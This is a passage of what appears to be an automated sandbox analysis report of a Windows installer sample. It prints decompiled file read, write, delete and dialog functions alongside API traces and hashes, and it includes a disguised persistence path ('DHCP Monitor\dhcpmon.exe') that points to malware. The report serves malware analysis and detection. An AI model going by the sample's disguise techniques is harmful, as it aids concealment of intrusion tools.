                                                                    C-Code - Quality: 100%
                                                                    			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                    0x00405e62
                                                                    0x00405e72
                                                                    0x00405e7a
                                                                    0x00000000
                                                                    0x00405e81
                                                                    0x00000000
                                                                    0x00405e83

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                    • Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
                                                                    • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                    • Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                    0x00405e91
                                                                    0x00405ea1
                                                                    0x00405ea9
                                                                    0x00000000
                                                                    0x00405eb0
                                                                    0x00000000
                                                                    0x00405eb2

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041ABAB,00415460,004033BF,00415460,0041ABAB,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                    • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                    • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                    0x0040344c
                                                                    0x00403452

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                    0x00405a1f
                                                                    0x00405a24
                                                                    0x00405a2d
                                                                    0x00405a30
                                                                    0x00405a38
                                                                    0x00405a3b
                                                                    0x00405a3e
                                                                    0x00405a46
                                                                    0x00405a48
                                                                    0x00405a49
                                                                    0x00000000
                                                                    0x00405a49
                                                                    0x00405a54
                                                                    0x00405a57
                                                                    0x00405a57
                                                                    0x00405a57
                                                                    0x00405a5b
                                                                    0x00405a6e
                                                                    0x00405a75
                                                                    0x00405a7a
                                                                    0x00405a7e
                                                                    0x00405a8e
                                                                    0x00405a80
                                                                    0x00405a86
                                                                    0x00405a86
                                                                    0x00405a93
                                                                    0x00405a96
                                                                    0x00405aa1
                                                                    0x00405aa7
                                                                    0x00405aac
                                                                    0x00405abc
                                                                    0x00405abe
                                                                    0x00405ac4
                                                                    0x00405ac7
                                                                    0x00405aca
                                                                    0x00405b82
                                                                    0x00405b82
                                                                    0x00405b86
                                                                    0x00405b88
                                                                    0x00405b88
                                                                    0x00405b88
                                                                    0x00405b88
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405ad0
                                                                    0x00405ad0
                                                                    0x00405ad9
                                                                    0x00405adf
                                                                    0x00405ae4
                                                                    0x00405ae7
                                                                    0x00405ae9
                                                                    0x00405aed
                                                                    0x00405aef
                                                                    0x00405aef
                                                                    0x00405aed
                                                                    0x00405af2
                                                                    0x00405af5
                                                                    0x00405b08
                                                                    0x00405b0a
                                                                    0x00405b0f
                                                                    0x00405b16
                                                                    0x00405b31
                                                                    0x00405b36
                                                                    0x00405b38
                                                                    0x00405b5c
                                                                    0x00405b3a
                                                                    0x00405b3a
                                                                    0x00405b3d
                                                                    0x00405b51
                                                                    0x00405b3f
                                                                    0x00405b42
                                                                    0x00405b4a
                                                                    0x00405b4a
                                                                    0x00405b3d
                                                                    0x00405b18
                                                                    0x00405b1e
                                                                    0x00405b20
                                                                    0x00405b26
                                                                    0x00405b26
                                                                    0x00405b20
                                                                    0x00000000
                                                                    0x00405b16
                                                                    0x00405af7
                                                                    0x00405afa
                                                                    0x00405afc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405afe
                                                                    0x00405b00
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b02
                                                                    0x00405b06
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405b61
                                                                    0x00405b6b
                                                                    0x00405b71
                                                                    0x00405b71
                                                                    0x00405b7c
                                                                    0x00000000
                                                                    0x00405b7c
                                                                    0x00405a98
                                                                    0x00405a9f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a5d
                                                                    0x00405a5d
                                                                    0x00405a5f
                                                                    0x00405b8c
                                                                    0x00405b8e
                                                                    0x00405b91
                                                                    0x00405be2
                                                                    0x00405be2
                                                                    0x00405be2
                                                                    0x00405b93
                                                                    0x00405b96
                                                                    0x00405ba1
                                                                    0x00405ba6
                                                                    0x00405ba8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405bab
                                                                    0x00405bb7
                                                                    0x00405bbc
                                                                    0x00405bbe
                                                                    0x00000000
                                                                    0x00405bd9
                                                                    0x00405bc0
                                                                    0x00405bc3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405bc8
                                                                    0x00000000
                                                                    0x00405bcf
                                                                    0x00405b98
                                                                    0x00405b98
                                                                    0x00000000
                                                                    0x00405b98
                                                                    0x00405a65
                                                                    0x00405a68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a68

                                                                    APIs
                                                                    • DeleteFileA.KERNEL32(?,?,76D7FA90,76D7F560,00000000), ref: 00405A3E
                                                                    • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405A86
                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405AA7
                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405AAD
                                                                    • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,76D7FA90,76D7F560,00000000), ref: 00405ABE
                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                    • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                    Strings
                                                                    • "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00405A15
                                                                    • \*.*, xrefs: 00405A80
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$\*.*
                                                                    • API String ID: 2035342205-4194548641
                                                                    • Opcode ID: cc75949f2c5ed0dd18fec942dd6501626af4dc272a4f1900502067ab13e55c41
                                                                    • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                    • Opcode Fuzzy Hash: cc75949f2c5ed0dd18fec942dd6501626af4dc272a4f1900502067ab13e55c41
                                                                    • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x4eecca
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                    0x00404cf4
                                                                    0x00404cfc
                                                                    0x00404d04
                                                                    0x00404d0a
                                                                    0x00404d22
                                                                    0x00404d25
                                                                    0x00404d26
                                                                    0x00404f53
                                                                    0x00404f5a
                                                                    0x00404f6e
                                                                    0x00404f5c
                                                                    0x00404f5e
                                                                    0x00404f61
                                                                    0x00404f62
                                                                    0x00404f69
                                                                    0x00404f69
                                                                    0x00404f7a
                                                                    0x00404f88
                                                                    0x00404f8b
                                                                    0x00404fa1
                                                                    0x00405016
                                                                    0x00405019
                                                                    0x0040501b
                                                                    0x00405025
                                                                    0x00405033
                                                                    0x00405033
                                                                    0x00405035
                                                                    0x0040503f
                                                                    0x00405045
                                                                    0x00405048
                                                                    0x0040504b
                                                                    0x00405066
                                                                    0x0040504d
                                                                    0x00405057
                                                                    0x00405057
                                                                    0x0040504b
                                                                    0x0040503f
                                                                    0x00000000
                                                                    0x00405019
                                                                    0x00404fa6
                                                                    0x00404fb1
                                                                    0x00404fb6
                                                                    0x00404fbd
                                                                    0x00404fc2
                                                                    0x00404fc6
                                                                    0x00404fd1
                                                                    0x00404fd1
                                                                    0x00404fd5
                                                                    0x00404fd9
                                                                    0x00404fdd
                                                                    0x00404ff0
                                                                    0x00404fdf
                                                                    0x00404fdf
                                                                    0x00404fe6
                                                                    0x00404fec
                                                                    0x00404fe8
                                                                    0x00404fe8
                                                                    0x00404fe8
                                                                    0x00404fe6
                                                                    0x00404ff4
                                                                    0x00404ff6
                                                                    0x00405009
                                                                    0x0040500c
                                                                    0x0040500f
                                                                    0x0040500f
                                                                    0x00404fd9
                                                                    0x00000000
                                                                    0x00404fc6
                                                                    0x00404fa8
                                                                    0x00404faf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405069
                                                                    0x00405069
                                                                    0x00405070
                                                                    0x004050e1
                                                                    0x004050e9
                                                                    0x004050f1
                                                                    0x004050f1
                                                                    0x004050fa
                                                                    0x004050fc
                                                                    0x00405103
                                                                    0x00405106
                                                                    0x00405106
                                                                    0x0040510c
                                                                    0x00405113
                                                                    0x00405116
                                                                    0x00405116
                                                                    0x0040511c
                                                                    0x00405122
                                                                    0x00405128
                                                                    0x00405128
                                                                    0x00405135
                                                                    0x00405295
                                                                    0x0040529c
                                                                    0x004052b9
                                                                    0x004052bf
                                                                    0x004052d1
                                                                    0x004052d1
                                                                    0x00000000
                                                                    0x0040513b
                                                                    0x0040513d
                                                                    0x00405142
                                                                    0x00405147
                                                                    0x0040514c
                                                                    0x0040514e
                                                                    0x0040514e
                                                                    0x0040514f
